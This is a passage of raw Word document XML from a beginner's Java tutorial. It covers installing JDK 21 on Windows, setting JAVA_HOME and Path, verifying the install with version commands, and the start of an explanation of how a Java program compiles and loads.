    <w:p w14:paraId="582C9783" w14:textId="77777777" w:rsidR="00E72EA3" w:rsidRPr="00CE4B95" w:rsidRDefault="00E72EA3" w:rsidP="00E72EA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ownload the installer for Windows x64.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41BD5CF3" w14:textId="77777777" w:rsidR="00E72EA3" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00E72EA3">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179C72">
          <v:rect id="_x0000_i1026" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="18A3A062" w14:textId="77777777" w:rsidR="00E72EA3" w:rsidRPr="00CE4B95" w:rsidRDefault="00E72EA3" w:rsidP="00E72EA3">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tep 2: Install Java</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="584C9BBA" w14:textId="77777777" w:rsidR="00E72EA3" w:rsidRPr="00CE4B95" w:rsidRDefault="00E72EA3" w:rsidP="00E72EA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un the installer (.msi or .exe)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DFF1D65" w14:textId="77777777" w:rsidR="00E72EA3" w:rsidRPr="00CE4B95" w:rsidRDefault="00E72EA3" w:rsidP="00E72EA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hoose installation path (e.g., C:\Program Files\Java\jdk-21)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F17519C" w14:textId="77777777" w:rsidR="00E72EA3" w:rsidRPr="00CE4B95" w:rsidRDefault="00E72EA3" w:rsidP="00E72EA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lete the installation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CA27DB4" w14:textId="77777777" w:rsidR="00E72EA3" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00E72EA3">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7D980E0">
          <v:rect id="_x0000_i1027" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="50BD266D" w14:textId="77777777" w:rsidR="00E72EA3" w:rsidRPr="00CE4B95" w:rsidRDefault="00E72EA3" w:rsidP="00E72EA3">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Step 3: Set Environment Variables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0377FABE" w14:textId="77777777" w:rsidR="00E72EA3" w:rsidRPr="00CE4B95" w:rsidRDefault="00E72EA3" w:rsidP="00E72EA3">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1. Set JAVA_HOME</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CDB0804" w14:textId="77777777" w:rsidR="00E72EA3" w:rsidRPr="00CE4B95" w:rsidRDefault="00E72EA3" w:rsidP="00E72EA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pen System Properties</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>Right click on This PC → Properties → Advanced system settings → Environment Variables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69CF55BF" w14:textId="77777777" w:rsidR="00E72EA3" w:rsidRPr="00CE4B95" w:rsidRDefault="00E72EA3" w:rsidP="00E72EA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nder System Variables, click New:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28F7EC6F" w14:textId="77777777" w:rsidR="00D00B59" w:rsidRPr="00CE4B95" w:rsidRDefault="00D00B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652517"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Variab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JAVA_HOME  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BA5857C" w14:textId="21C73B61" w:rsidR="00D00B59" w:rsidRPr="00CE4B95" w:rsidRDefault="00D00B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652517"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Variab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Valu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Program </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Files</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\Java\jdk</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21</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43C9365D" w14:textId="77777777" w:rsidR="00E72EA3" w:rsidRPr="00CE4B95" w:rsidRDefault="00E72EA3" w:rsidP="00E72EA3">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2. Add to Path variable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19375725" w14:textId="77777777" w:rsidR="00E72EA3" w:rsidRPr="00CE4B95" w:rsidRDefault="00E72EA3" w:rsidP="00E72EA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e same "Environment Variables" window:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B16D33F" w14:textId="77777777" w:rsidR="00E72EA3" w:rsidRPr="00CE4B95" w:rsidRDefault="00E72EA3" w:rsidP="00E72EA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nd Path under System Variables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35B3098E" w14:textId="77777777" w:rsidR="00E72EA3" w:rsidRPr="00CE4B95" w:rsidRDefault="00E72EA3" w:rsidP="00E72EA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ick Edit → New and add:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EC3C7C3" w14:textId="672254F2" w:rsidR="00FF20F6" w:rsidRPr="00CE4B95" w:rsidRDefault="00FF20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2741490"/>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JAVA_HO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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>in</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A055518" w14:textId="77777777" w:rsidR="00E72EA3" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00E72EA3">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320BCF">
          <v:rect id="_x0000_i1028" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="799E49D0" w14:textId="77777777" w:rsidR="00E72EA3" w:rsidRPr="00CE4B95" w:rsidRDefault="00E72EA3" w:rsidP="00E72EA3">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Step 4: Verify Java Installation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4882B76F" w14:textId="77777777" w:rsidR="00E72EA3" w:rsidRPr="00CE4B95" w:rsidRDefault="00E72EA3" w:rsidP="00E72EA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pen Command Prompt and run:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DE6FD97" w14:textId="6C90FD5A" w:rsidR="00FF20F6" w:rsidRPr="00CE4B95" w:rsidRDefault="00FF20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000102"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">jav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version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10905A8F" w14:textId="77777777" w:rsidR="00E72EA3" w:rsidRPr="00CE4B95" w:rsidRDefault="00E72EA3" w:rsidP="00E72EA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output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22246BBF" w14:textId="77777777" w:rsidR="00FF20F6" w:rsidRPr="00CE4B95" w:rsidRDefault="00FF20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0744920"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">java version </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="008800"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"21.0.1"</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023</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0</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7</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> LTS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="267A28D7" w14:textId="612527F3" w:rsidR="00FF20F6" w:rsidRPr="00CE4B95" w:rsidRDefault="00FF20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0744920"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>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E </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Runtim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nvironme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5B91AB0" w14:textId="77777777" w:rsidR="00E72EA3" w:rsidRPr="00CE4B95" w:rsidRDefault="00E72EA3" w:rsidP="00E72EA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so try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="340EF44D" w14:textId="06FF64A9" w:rsidR="00FF20F6" w:rsidRPr="00CE4B95" w:rsidRDefault="00FF20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544482"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">javac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version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="399E070D" w14:textId="77777777" w:rsidR="00E72EA3" w:rsidRPr="00CE4B95" w:rsidRDefault="00E72EA3" w:rsidP="00E72EA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o verify the Java compiler (javac) is set correctly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="767F7266" w14:textId="3F7709FB" w:rsidR="00E72EA3" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00E72EA3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="12E6E8A0">
          <v:rect id="_x0000_i1029" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E063DCC" w14:textId="3DD43F78" w:rsidR="00D70CC4" w:rsidRPr="00CE4B95" w:rsidRDefault="00D70CC4">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc196307484"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">Explain Java Program </w:t>
      </w:r>
      <w:r w:rsidR="00FF5A4B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>execution</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="7377B7F8" w14:textId="4DFCC286" w:rsidR="005D799E" w:rsidRPr="00CE4B95" w:rsidRDefault="00D431F3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r w:rsidR="005D799E" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Writing the Source Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52D9A97E" w14:textId="77777777" w:rsidR="005D799E" w:rsidRPr="00CE4B95" w:rsidRDefault="005D799E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="360"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>You create a .java file containing your Java code (e.g., HelloWorld.java)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03481F1E" w14:textId="77777777" w:rsidR="005D799E" w:rsidRPr="00CE4B95" w:rsidRDefault="005D799E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="360"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2008F2E2" w14:textId="77777777" w:rsidR="00D431F3" w:rsidRPr="00CE4B95" w:rsidRDefault="00D431F3" w:rsidP="00C154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95189164"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pP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HelloWorld</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125A9A73" w14:textId="77777777" w:rsidR="00D431F3" w:rsidRPr="00CE4B95" w:rsidRDefault="00D431F3" w:rsidP="00C154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9518916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stat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main</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String</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arg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38E3F928" w14:textId="77777777" w:rsidR="00D431F3" w:rsidRPr="00CE4B95" w:rsidRDefault="00D431F3" w:rsidP="00C154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9518916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Hello, World!"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CDA4308" w14:textId="77777777" w:rsidR="00D431F3" w:rsidRPr="00CE4B95" w:rsidRDefault="00D431F3" w:rsidP="00C154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9518916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4B465A8D" w14:textId="3A5E47FF" w:rsidR="00D431F3" w:rsidRPr="00CE4B95" w:rsidRDefault="00D431F3" w:rsidP="00C154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95189164"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pP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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7674BE47" w14:textId="77777777" w:rsidR="00B82862" w:rsidRPr="00CE4B95" w:rsidRDefault="00B82862" w:rsidP="00C15401">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F8B771E" w14:textId="59BE594D" w:rsidR="005D799E" w:rsidRPr="00CE4B95" w:rsidRDefault="005D799E" w:rsidP="00C15401">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>2. Compilation (javac)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4465844D" w14:textId="77777777" w:rsidR="005D799E" w:rsidRPr="00CE4B95" w:rsidRDefault="005D799E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>The Java compiler (javac) converts your source code into </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>bytecode</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t> (platform-independent intermediate code)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="059165FA" w14:textId="77777777" w:rsidR="005D799E" w:rsidRPr="00CE4B95" w:rsidRDefault="005D799E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Creates .class files (e.g., HelloWorld.class)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3601DFCB" w14:textId="77777777" w:rsidR="005D799E" w:rsidRPr="00CE4B95" w:rsidRDefault="005D799E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Bytecode is not machine code - it's instructions for the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Java Virtual Machine (JVM)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51D01A27" w14:textId="77777777" w:rsidR="00E82391" w:rsidRPr="00CE4B95" w:rsidRDefault="00E82391" w:rsidP="00C15401">
      <w:pPr>
        <w:ind w:left="-360" w:firstLine="1080"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C4D58BB" w14:textId="77777777" w:rsidR="00E82391" w:rsidRPr="00CE4B95" w:rsidRDefault="00E82391" w:rsidP="00C15401">
      <w:pPr>
        <w:ind w:left="-360" w:firstLine="1080"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00F33C87" w14:textId="37882056" w:rsidR="005D799E" w:rsidRPr="00CE4B95" w:rsidRDefault="005D799E" w:rsidP="00C15401">
      <w:pPr>
        <w:ind w:left="-360" w:firstLine="1080"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>3. Class Loading</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E65A8FD" w14:textId="77777777" w:rsidR="005D799E" w:rsidRPr="00CE4B95" w:rsidRDefault="005D799E" w:rsidP="00C15401">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>When you run java HelloWorld:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D10B040" w14:textId="77777777" w:rsidR="005D799E" w:rsidRPr="00CE4B95" w:rsidRDefault="005D799E" w:rsidP="00C15401">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>a) Bootstrap ClassLoader</w:t>
